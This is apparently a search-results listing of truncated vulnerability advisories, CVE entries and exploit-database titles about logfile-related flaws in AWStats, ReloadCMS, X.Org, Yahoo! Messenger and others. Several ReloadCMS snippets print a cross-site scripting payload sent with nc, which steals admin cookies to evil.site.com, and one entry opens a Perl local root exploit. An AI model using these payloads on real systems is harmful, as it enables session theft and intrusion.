DEBIAN-CVE-2006-2644

AWStats 6.5, and possibly other versions, allows remote authenticated users to execute arbitrary code by using the configdir parameter to awstats.pl to upload a configuration file whose name contains shell metacharacters, then access that file using the LogFile directive...

CVE-2006-2644

AWStats 6.5, and possibly other versions, allows remote authenticated users to execute arbitrary code by using the configdir parameter to awstats.pl to upload a configuration file whose name contains shell metacharacters, then access that file using the LogFile directive...

CVE-2006-2608

artmedic newsletter 4.1 and possibly other versions, when registerglobals is enabled, allows remote attackers to modify arbitrary files and execute arbitrary PHP code via the logfile parameter in a direct request to log.php, which causes the $logfile variable to be redefined to an...

FreeBSD : awstats -- arbitrary command execution vulnerability (2df297a2-dc74-11da-a22b-000c6ec775d9)

OS Reviews reports : If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character '|' leads to an insecure call to Perl's open function an...

awstats -- arbitrary command execution vulnerability

OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character "|" leads to an insecure call to Perl's open function and...

ReloadCMS-1.2.5.txt

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit

Exploit for unknown platform in category web applications ======================================================================= ReloadCMS nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent:...

ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

DEBIAN-CVE-2006-0745

X.Org server xorg-server 1.0.0 and later, X11R6.9.0, and X11R7.0 inadvertently treats the address of the geteuid function as if it is the return value of a call to geteuid, which allows local users to bypass intended restrictions and 1 execute arbitrary code via the -modulepath command line optio...

Mandrake Linux Security Advisory : xorg-x11 (MDKSA-2006:056)

Versions of Xorg 6.9.0 and greater have a bug in xf86Init.c, which allows non-root users to use the -modulepath, -logfile and -configure options. This allows loading of arbitrary modules which will execute as the root user, as well as a local DoS by overwriting system files. Updated packages have...

Adobe Version Cue 1.0/1.0.1 (OSX) - Local Privilege Escalation

!/usr/bin/perl Adobe Version Cue VCNativeOSX: local root exploit. by: vade79/v9 [email protected] fakehalo/realhalo Adobe Version Cue's VCNative program writes data to a log file in the current working directory while running as setuid root. the logfile is formated as /VCNative-.log, which is easily...

Jax PHP Scripts 1.0/1.34/2.14/3.31 - logfile.csv User IP Disclosure

source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. An attacker may leverage any of these issues to have arbitrary script...

Jax PHP Scripts 1.01.342.143.31 - logfile.csv User IP Disclosure

Jax PHP Scripts 1.01.342.143.31 - logfile.csv User IP Disclosure source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. An...

CVE-2005-1671

The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive...

CVE-2005-1671

The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive...

CVE-2005-1671

The CVE-2005-1671 issue affects Yahoo! Messenger 5.x through 6.0, where the Logfile feature can be activated via a YMSGR: URL. This causes output to be written to a single ypager.log file across multiple users, and there is no proper warning to subsequent users that the feature is enabled, enabli...

sonicwallXSS.txt

SonicWALL SOHO/10 - XSS and Code Injection vulnerability ======================================================== Product: ======== SonicWall SOHO/10 is the 2nd generation Internet Security Appliance from Sonicwall, with firewall-, vpn-, contentfiltering- and other capabilities. Vulnerability:...

CVE-2005-1087

CRLF injection vulnerability in the cmdIS.DLL plugin for AN HTTPD Server 1.42n allows remote attackers to spoof or hide entries in the logfile, and possibly read files using an injected type command, via CRLF sequences in an HTTP request...

CVE-2005-1087

The CVE-2005-1087 entry concerns the AN HTTPD Server 1.42n, specifically the cmdIS.DLL plugin . It describes a CRLF injection vulnerability triggered by CRLF sequences in an HTTP request, enabling remote attackers to spoof or hide logfile entries and potentially read files via an injected type co...

CVE-2005-1087

CRLF injection vulnerability in the cmdIS.DLL plugin for AN HTTPD Server 1.42n allows remote attackers to spoof or hide entries in the logfile, and possibly read files using an injected type command, via CRLF sequences in an HTTP request...